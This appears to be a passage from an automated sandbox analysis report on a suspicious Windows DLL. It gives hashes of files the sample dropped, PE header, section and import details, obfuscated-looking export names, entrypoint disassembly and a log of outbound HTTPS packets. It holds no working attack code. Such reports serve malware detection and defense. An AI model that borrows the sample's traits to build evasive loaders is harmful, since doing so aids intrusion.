                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A83.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486599306136513
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2r8fm8M4JCdsTMFl+q8vjsTh4SrSh6d:uITf9EqSN0IJNoKihDWh6d
                                                                                                                        MD5:F5119CC37CD940B95701B555B8405D56
                                                                                                                        SHA1:0F6AEC842D402C511BC033B95CDDE4B721F845CA
                                                                                                                        SHA-256:7B59F212C271180A12BD3B2F239E245B604E7BE9F2F6D4BDD729106A8E0E63E5
                                                                                                                        SHA-512:CAF3A254182B3FA64D7552562B9144A51D49A778C28225E64364D84C9B46F065861BF8E23F693BBCA769AB0D02137C69AB3B75B120D2C2582A245C0804917952
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CB4.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:38:06 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36016
                                                                                                                        Entropy (8bit):2.4897777598497166
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xC0HXLDCwswpbRb3TZO2ODjUyrcFl7yuQM8BXEZniQcd9eq:s0771b1WUyrcPSM8Biinyq
                                                                                                                        MD5:559FD5E2D54239F3AF7994402E1F225A
                                                                                                                        SHA1:6F975E163EC0244D6973DCF1058DC318A990BAAF
                                                                                                                        SHA-256:4E9B64C1A7891E3469C235B9E4F92693B6D9451B09FE8BB64D09FA8CFDA9EF47
                                                                                                                        SHA-512:B03EA1DB6B58C4DFCD6BACEBC95BFD282F11D8BE9DF5F0ECF7F32F958898832D290CD6ED3B21D6D8A40C201D81B71625C0E6F27C670708CF7536212D02B6BAAB
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... ........da...................U...........B..............GenuineIntelW...........T.......@...`.da!............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6984.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8416
                                                                                                                        Entropy (8bit):3.697753685979791
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi926o6jYy6Yoy6xgmf8zSNz+prfZ89bYbasfyejm:RrlsNis6o6jYy6Y96xgmf8zSNpYb5fL6
                                                                                                                        MD5:BADE93E59CD5720AB99E2508033FE2BB
                                                                                                                        SHA1:9257D92BE814163ED9D6E71DC5F282D0377CD90D
                                                                                                                        SHA-256:E0576D35FA22FA6525FED18862A5C4D3FEF0A7DDA9ABA2DD711D994276920D3C
                                                                                                                        SHA-512:5A8B6AE760691632CBF5B4D45DC7E9DDBA241701D9C2D018A106BB338FCCA751E73FCF7FC789E9AD8C4745FA6D464E7050176AC96293F752BA48C24A4042FF07
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E67.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486306505900062
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2Q8fm8M4JCdsTMFMDGv+q8vjsTv4SrSld:uITf9EqSN0tJNYvKivDWld
                                                                                                                        MD5:139252536DD735CAA02910CCEF45FF77
                                                                                                                        SHA1:B5EA76ED280C8826367FF09C33596FBD7E73E301
                                                                                                                        SHA-256:D78ACA3358C19DB67E52384ED6AEE82B755A321E0E5963312DBDE4B5DFD8C370
                                                                                                                        SHA-512:5BC27230DB2D3272AD98C0DFE3BB0BA29425ED587B6909065F635691F54F9B0A282092D6970FA70DD72D9A93ADAA3CD7691B1604ADD93176B25CCAEA6EF0EA19
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):6.669952151971332
                                                                                                                        TrID:
                                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:616412739e268.dll
                                                                                                                        File size:718336
                                                                                                                        MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                        SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                        SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                        SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                        SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m$aV.J2V.J2V.J2...2U.J2_t.2H.J2.cH3R.J2.cO3_.J2.cI3D.J2...2H.J2V.K2..J2.cO3).J2.cJ3W.J2.cJ3W.J2V..2W.J2.cH3W.J2RichV.J2.......

                                                                                                                        File Icon

                                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x1003ab77
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x10000000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                        Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                                        jne 00007F9CC8990D67h
                                                                                                                        call 00007F9CC8991852h
                                                                                                                        push dword ptr [ebp+10h]
                                                                                                                        push dword ptr [ebp+0Ch]
                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                        call 00007F9CC8990C0Ah
                                                                                                                        add esp, 0Ch
                                                                                                                        pop ebp
                                                                                                                        retn 000Ch
                                                                                                                        mov ecx, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], ecx
                                                                                                                        pop ecx
                                                                                                                        pop edi
                                                                                                                        pop edi
                                                                                                                        pop esi
                                                                                                                        pop ebx
                                                                                                                        mov esp, ebp
                                                                                                                        pop ebp
                                                                                                                        push ecx
                                                                                                                        ret
                                                                                                                        mov ecx, dword ptr [ebp-10h]
                                                                                                                        xor ecx, ebp
                                                                                                                        call 00007F9CC8990963h
                                                                                                                        jmp 00007F9CC8990D40h
                                                                                                                        mov ecx, dword ptr [ebp-14h]
                                                                                                                        xor ecx, ebp
                                                                                                                        call 00007F9CC8990952h
                                                                                                                        jmp 00007F9CC8990D2Fh
                                                                                                                        push eax
                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                        lea eax, dword ptr [esp+0Ch]
                                                                                                                        sub esp, dword ptr [esp+0Ch]
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov dword ptr [eax], ebp
                                                                                                                        mov ebp, eax
                                                                                                                        mov eax, dword ptr [100AA0D4h]
                                                                                                                        xor eax, ebp
                                                                                                                        push eax
                                                                                                                        push dword ptr [ebp-04h]
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                        ret
                                                                                                                        push eax
                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                        lea eax, dword ptr [esp+0Ch]
                                                                                                                        sub esp, dword ptr [esp+0Ch]
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov dword ptr [eax], ebp
                                                                                                                        mov ebp, eax
                                                                                                                        mov eax, dword ptr [100AA0D4h]
                                                                                                                        xor eax, ebp
                                                                                                                        push eax
                                                                                                                        mov dword ptr [ebp-10h], eax
                                                                                                                        push dword ptr [ebp-04h]
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                        ret
                                                                                                                        push eax
                                                                                                                        inc dword ptr fs:[eax]

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x79f710x7a000False0.510071801358data6.75463290974IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60181106954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                                        USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                                                        MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                        Exports

                                                                                                                        NameOrdinalAddress
                                                                                                                        BeGrass10x10016020
                                                                                                                        Fieldeight20x100162f0
                                                                                                                        Often30x10016510
                                                                                                                        Townenter40x100167a0

                                                                                                                        Network Behavior

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 12, 2021 00:38:03.252177954 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.252216101 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.252338886 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.260545015 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.260579109 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.587343931 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.587502956 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.591922045 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.591939926 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.592248917 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.643688917 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:04.786664009 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:04.831147909 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:04.901016951 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:04.901099920 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:04.901241064 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:05.055090904 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:05.055150986 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:05.055206060 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:05.055217981 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:10.938795090 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:10.938858986 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:10.939007044 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:10.944888115 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:10.944916010 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.257594109 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.257904053 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.262480021 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.262511015 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.262924910 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.316159964 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.595365047 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.639143944 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.709975958 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.710064888 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.710170031 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.710742950 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.710772991 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.710854053 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.710865021 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:45.900778055 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:45.900826931 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:45.901609898 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:45.902388096 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:45.902405977 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.422904015 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.423059940 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.426368952 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.426393032 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.426701069 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.430068970 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.471141100 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.600647926 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.600722075 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.600783110 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.601516008 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.601542950 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.635039091 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.635082960 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.635184050 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.636074066 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.636096954 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.733916998 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.734044075 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.737009048 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.737025023 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.737360001 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.739736080 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.767653942 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.767720938 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.767815113 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.768023014 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.768037081 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.796379089 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.796427965 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.796536922 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.797328949 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.797353029 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.887511969 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.887612104 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.892256975 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.892277002 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.892529011 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.895700932 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.939138889 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.957782030 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.957911968 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.957983971 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.958444118 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.958467007 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:52.762846947 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:52.762887001 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:52.762998104 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:52.763700008 CEST49809443192.168.2.440.97.153.146
